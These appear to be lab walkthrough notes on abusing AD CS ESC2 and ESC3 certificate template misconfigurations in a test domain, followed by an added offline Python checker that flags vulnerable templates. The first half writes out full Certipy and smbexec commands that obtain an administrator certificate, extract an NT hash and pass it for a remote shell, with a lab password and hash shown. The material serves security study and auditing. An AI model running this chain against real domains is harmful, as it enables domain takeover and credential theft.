ADCS - ESC2 & ESC3
ESC2 covers templates that define the Any Purpose EKU or no EKU at all. In order to abuse this misconfiguration, the following conditions must be met:
The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.
Manager approval is disabled. Details are the same as in ESC1.
No authorized signatures are required. Details are the same as in ESC1.
An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.
The certificate template defines the Any Purpose EKU (OID 2.5.29.37.0) or no EKU at all. A certificate issued from such a template is valid for any purpose, including acting as an enrollment agent, which is why the abuse below follows the same on-behalf-of path as ESC3.
Request a certificate from the ESC2 template (certipy saves it as joaquin.pereida.pfx):
sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC2 -ca MARYLAND-CA

Request a certificate from the User template on behalf of the administrator, using the ESC2 certificate obtained above as the enrollment agent certificate (-pfx). The result is administrator.pfx:
sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template User -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.pereida.pfx

Authenticate as the administrator with that certificate (PKINIT); certipy prints the account's NT hash:
sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Get a shell (cmd or PowerShell) by passing the NT hash from the previous step (the LM half, aad3b435b51404eeaad3b435b51404ee, is the empty LM hash):
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local'
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local' -shell-type powershell
The same chain works with the ESC3-CRA and ESC3 templates in the lab:
Enrollment Agent Templates — ESC3
In order to abuse this misconfiguration, the following conditions must be met:
The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.
Manager approval is disabled. Details are the same as in ESC1.
No authorized signatures are required. Details are the same as in ESC1.
An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.
The certificate template defines the Certificate Request Agent EKU. The Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) allows for requesting other certificate templates on behalf of other principals.
The target template (User or ESC3 here) defines an EKU that permits domain authentication and either is a schema version 1 template (no issuance-policy check) or requires one authorized signature carrying the Certificate Request Agent application policy.
Enrollment agent restrictions are not implemented on the CA.
Request the enrollment agent certificate from ESC3-CRA:
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3-CRA -ca MARYLAND-CA
Request a certificate from ESC3 on behalf of the administrator with that agent certificate (use the .pfx filename certipy printed in the previous step):
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3 -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.pereida.pfx
Authenticate with the resulting administrator.pfx:
certipy auth -pfx administrator.pfx -username administrator -domain maryland.local -dc-ip 192.168.56.12
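To turn the ESC2 and ESC3 condition lists above into something checkable, here is an offline template checker. It is an added example, not part of the original notes and not Certipy's own code: it encodes the conditions from both sections against constructed template records whose attribute names mirror the AD certificate template attributes (pKIExtendedKeyUsage, msPKI-Enrollment-Flag, msPKI-RA-Signature, msPKI-RA-Application-Policies, msPKI-Template-Schema-Version). The domain SID, the template names and their settings are made up for illustration; in a real audit you would fill the records from LDAP (for example from Certipy's `find` output).

```python
"""Offline ESC2/ESC3 certificate template checker.

Added example, not the page's or Certipy's code. Template records are
constructed; attribute names mirror the AD certificate template attributes.
"""
from dataclasses import dataclass, field

# Standard EKU / application policy OIDs
OID_ANY_PURPOSE = "2.5.29.37.0"
OID_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
AUTH_EKUS = {OID_ANY_PURPOSE, OID_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_PKINIT_CLIENT_AUTH}

# msPKI-Enrollment-Flag bit for "CA certificate manager approval"
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# Assumed (made-up) lab domain SID; groups every domain user belongs to
DOMAIN_SID = "S-1-5-21-1111-2222-3333"
LOW_PRIV_SIDS = {
    "S-1-1-0",            # Everyone
    "S-1-5-11",           # Authenticated Users
    f"{DOMAIN_SID}-513",  # Domain Users
}


@dataclass
class Template:
    name: str
    enroll_sids: set                                             # SIDs with Enroll on the template ACL
    ekus: list = field(default_factory=list)                     # pKIExtendedKeyUsage
    enrollment_flag: int = 0                                     # msPKI-Enrollment-Flag
    ra_signature: int = 0                                        # msPKI-RA-Signature
    ra_application_policies: list = field(default_factory=list)  # msPKI-RA-Application-Policies
    schema_version: int = 2                                      # msPKI-Template-Schema-Version


def low_priv_can_enroll(t, low_priv_sids=LOW_PRIV_SIDS):
    return bool(t.enroll_sids & low_priv_sids)


def manager_approval(t):
    return bool(t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS)


def _base_conditions(t):
    # Shared ESC1/ESC2/ESC3 preconditions: low-priv enrollment,
    # no manager approval, no authorized signatures required.
    return low_priv_can_enroll(t) and not manager_approval(t) and t.ra_signature == 0


def is_esc2(t):
    # Any Purpose EKU, or no EKU at all
    return _base_conditions(t) and (not t.ekus or OID_ANY_PURPOSE in t.ekus)


def is_esc3_agent(t):
    # Template issues enrollment agent (Certificate Request Agent) certificates
    return _base_conditions(t) and OID_CERT_REQUEST_AGENT in t.ekus


def is_esc3_target(t):
    # Template an agent certificate can enrol in on behalf of another user:
    # schema v1 templates (e.g. User) perform no issuance-policy check; newer
    # templates must require exactly one signature with the CRA policy.
    if not low_priv_can_enroll(t) or manager_approval(t):
        return False
    if not set(t.ekus) & AUTH_EKUS:
        return False
    if t.schema_version == 1:
        return True
    return t.ra_signature == 1 and OID_CERT_REQUEST_AGENT in t.ra_application_policies


def classify(templates):
    findings = {}
    for t in templates:
        hits = []
        if is_esc2(t):
            hits.append("ESC2")
        if is_esc3_agent(t):
            hits.append("ESC3-agent")
        if is_esc3_target(t):
            hits.append("ESC3-target")
        findings[t.name] = hits
    return findings


# Constructed templates modelled on the lab template names used above
LAB_TEMPLATES = [
    Template("ESC2", {f"{DOMAIN_SID}-513"}, ekus=[OID_ANY_PURPOSE]),
    Template("ESC3-CRA", {f"{DOMAIN_SID}-513"}, ekus=[OID_CERT_REQUEST_AGENT]),
    Template("ESC3", {f"{DOMAIN_SID}-513"}, ekus=[OID_CLIENT_AUTH],
             ra_signature=1, ra_application_policies=[OID_CERT_REQUEST_AGENT]),
    Template("User", {f"{DOMAIN_SID}-513"}, ekus=[OID_CLIENT_AUTH], schema_version=1),
    # Same as ESC2 but with manager approval enabled: no longer abusable
    Template("ESC2-Approved", {f"{DOMAIN_SID}-513"}, ekus=[OID_ANY_PURPOSE],
             enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS),
    # No EKU, but only Domain Admins (RID 512) may enrol
    Template("SubCA", {f"{DOMAIN_SID}-512"}),
]

if __name__ == "__main__":
    for name, hits in classify(LAB_TEMPLATES).items():
        print(f"{name:14s} {', '.join(hits) or 'clean'}")
```

The two hardened records at the end show why each condition matters: turning on manager approval or removing low-privileged enrollment rights on its own is enough to make the Any Purpose template stop qualifying, which is also the order in which you would remediate a real finding.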